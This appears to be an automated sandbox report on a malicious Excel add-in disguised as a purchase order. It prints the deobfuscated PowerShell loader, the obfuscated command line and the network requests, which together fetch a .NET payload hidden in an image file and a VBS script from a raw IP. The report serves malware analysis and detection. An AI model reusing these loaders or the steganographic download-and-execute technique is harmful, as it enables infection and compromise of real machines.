Analysis

  • max time kernel
    140s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 06:42 UTC

General

  • Target

    PO-674394.xlam

  • Size

    642KB

  • MD5

    66013791a9a70b8b6429a842ee029ccd

  • SHA1

    a8c5aaf7a3f794bda85717f264a65075c80a10a1

  • SHA256

    ad6dabfbf9b343f2a04f6cdfbc34411b378212dea73d669cab262564420d6ecb

  • SHA512

    9935eb3e66ccf49d3342c88324c6f838239e68d7e28010b1cb4b73b4db0351d200fdfec67a6d2ee53b14b6e9812b5eefcd004a9ea46bc3f99fd96abea206520f

  • SSDEEP

    12288:Kqs/irVm8pm8UKkayx+Uu1oNR4rdCTflYmWu4K+7ZGGnaZZg9xQ9ar6MnDwI:Bqyg8rovs6WC7Su4K+7OZSnUHMnDl

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$imageurl = "https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937"
2
$webclient = new-object system.net.webclient
3
$imagebytes = $webclient.downloaddata("https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937")
4
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
5
$startflag = "<<BASE64_START>>"
6
$endflag = "<<BASE64_END>>"
7
$startindex = $imagetext.indexof("<<BASE64_START>>")
8
$endindex = $imagetext.indexof("<<BASE64_END>>")
9
$startindex -ge 0 -and $endindex -gt $startindex
10
$startindex = $startflag.length
11
$base64length = $endindex - $startindex
12
$base64command = $imagetext.substring($startindex, $base64length)
13
$commandbytes = [system.convert]::frombase64string($base64command)
14
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
15
$type = $loadedassembly.gettype("Fiber.Home")
16
$method = ($type.getmethod("VAI")).invoke($null, [object[]]"txt.smhogn/25.84.011.97//:ptth", "dfdfd", "dfdf", "dfdf", "dadsa", "de", "cu")
17
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

exe.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-674394.xlam
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2200
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\yhsdfsopl.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDEDgTreNgDgTrevDgTreDYDgTreMDgTreDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrecgB1DgTreG0DgTrecDgTreBfDgTreHYDgTreYgBzDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDYDgTreOQDgTre1DgTreDQDgTreMDgTreDgTre4DgTreDkDgTreMwDgTre3DgTreCcDgTreOwDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTreuDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreKQDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreEYDgTreaQBiDgTreGUDgTrecgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBzDgTreG0DgTreaDgTreBvDgTreGcDgTrebgDgTrevDgTreDIDgTreNQDgTreuDgTreDgDgTreNDgTreDgTreuDgTreDDgTreDgTreMQDgTrexDgTreC4DgTreOQDgTre3DgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZgBkDgTreGYDgTreZDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBmDgTreGQDgTreZgDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBmDgTreGQDgTreZgDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBhDgTreGQDgTrecwBhDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTredQDgTrenDgTreCkDgTreKQDgTre='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.smhogn/25.84.011.97//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2376

Network

  • flag-us
    GET
    http://79.110.48.52/ngown.vbs
    EQNEDT32.EXE
    Remote address:
    79.110.48.52:80
    Request
    GET /ngown.vbs HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 79.110.48.52
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: text/vbscript
    Content-Encoding: gzip
    Last-Modified: Tue, 10 Oct 2023 09:35:06 GMT
    Accept-Ranges: bytes
    ETag: "0416ed5dfbd91:0"
    Vary: Accept-Encoding
    Server: Microsoft-IIS/10.0
    Date: Wed, 11 Oct 2023 09:08:30 GMT
    Content-Length: 27358
  • flag-us
    DNS
    uploaddeimagens.com.br
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    uploaddeimagens.com.br
    IN A
    Response
    uploaddeimagens.com.br
    IN A
    188.114.97.0
    uploaddeimagens.com.br
    IN A
    188.114.96.0
  • 79.110.48.52:80
    http://79.110.48.52/ngown.vbs
    http
    EQNEDT32.EXE
    1.1kB
    29.0kB
    16
    23

    HTTP Request

    GET http://79.110.48.52/ngown.vbs

    HTTP Response

    200
  • 188.114.97.0:443
    uploaddeimagens.com.br
    powershell.exe
    152 B
    3
  • 188.114.96.0:443
    uploaddeimagens.com.br
    powershell.exe
    152 B
    3
  • 8.8.8.8:53
    uploaddeimagens.com.br
    dns
    powershell.exe
    68 B
    100 B
    1
    1

    DNS Request

    uploaddeimagens.com.br

    DNS Response

    188.114.97.0
    188.114.96.0

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM8H1H0I36ERJ9EE67VD.temp

    Filesize

    7KB

    MD5

    684412a0471d43a545cb8de9c4f23b4a

    SHA1

    f443933a14868cc722d2fbdb9868b70421f6d6d4

    SHA256

    2e5069338d706cb005551b8cf12b6f95f628d57a8531f02e64a6ae6004aa4538

    SHA512

    38e57161ae5c8b7ab9ec5fb75f9d92662d65d1343692a42ab5693efb9d4c164191c6bc9fbcd808038256da858d01d178042df5f2540c230a2b2b48f56909f18b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    684412a0471d43a545cb8de9c4f23b4a

    SHA1

    f443933a14868cc722d2fbdb9868b70421f6d6d4

    SHA256

    2e5069338d706cb005551b8cf12b6f95f628d57a8531f02e64a6ae6004aa4538

    SHA512

    38e57161ae5c8b7ab9ec5fb75f9d92662d65d1343692a42ab5693efb9d4c164191c6bc9fbcd808038256da858d01d178042df5f2540c230a2b2b48f56909f18b

  • C:\Users\Admin\AppData\Roaming\yhsdfsopl.vbs

    Filesize

    351KB

    MD5

    6043eedebfdf2d673bcf4f6b1dd4343c

    SHA1

    f685eff91a8bd534272877c9b74c4b6e77aeb370

    SHA256

    81c08b626b502bd21d5d900e25eac6568a8b7728abbcbf88602f31fa0a6ec587

    SHA512

    55eace1381464a262cfc5f49026985b47b030ff13c5c9729d846cab81a305d18d8b537aea61f94cb76f8cf3b50591fc2eaa12032a317619a75dd91addb96dc6c

  • C:\Users\Admin\AppData\Roaming\yhsdfsopl.vbs

    Filesize

    351KB

    MD5

    6043eedebfdf2d673bcf4f6b1dd4343c

    SHA1

    f685eff91a8bd534272877c9b74c4b6e77aeb370

    SHA256

    81c08b626b502bd21d5d900e25eac6568a8b7728abbcbf88602f31fa0a6ec587

    SHA512

    55eace1381464a262cfc5f49026985b47b030ff13c5c9729d846cab81a305d18d8b537aea61f94cb76f8cf3b50591fc2eaa12032a317619a75dd91addb96dc6c

  • memory/2200-1-0x0000000072BCD000-0x0000000072BD8000-memory.dmp

    Filesize

    44KB

  • memory/2200-2-0x0000000072BCD000-0x0000000072BD8000-memory.dmp

    Filesize

    44KB

  • memory/2200-39-0x0000000072BCD000-0x0000000072BD8000-memory.dmp

    Filesize

    44KB

  • memory/2200-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2200-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2376-32-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2376-34-0x00000000023A0000-0x00000000023E0000-memory.dmp

    Filesize

    256KB

  • memory/2376-40-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2376-35-0x00000000023A0000-0x00000000023E0000-memory.dmp

    Filesize

    256KB

  • memory/2376-33-0x00000000023A0000-0x00000000023E0000-memory.dmp

    Filesize

    256KB

  • memory/2376-27-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2376-30-0x00000000023A0000-0x00000000023E0000-memory.dmp

    Filesize

    256KB

  • memory/2376-26-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2376-29-0x00000000023A0000-0x00000000023E0000-memory.dmp

    Filesize

    256KB

  • memory/2376-28-0x00000000023A0000-0x00000000023E0000-memory.dmp

    Filesize

    256KB

  • memory/2596-15-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2596-16-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2596-14-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2596-17-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2596-20-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2596-19-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2596-13-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2596-12-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

  • memory/2596-18-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2596-41-0x000000006CB70000-0x000000006D11B000-memory.dmp

    Filesize

    5.7MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.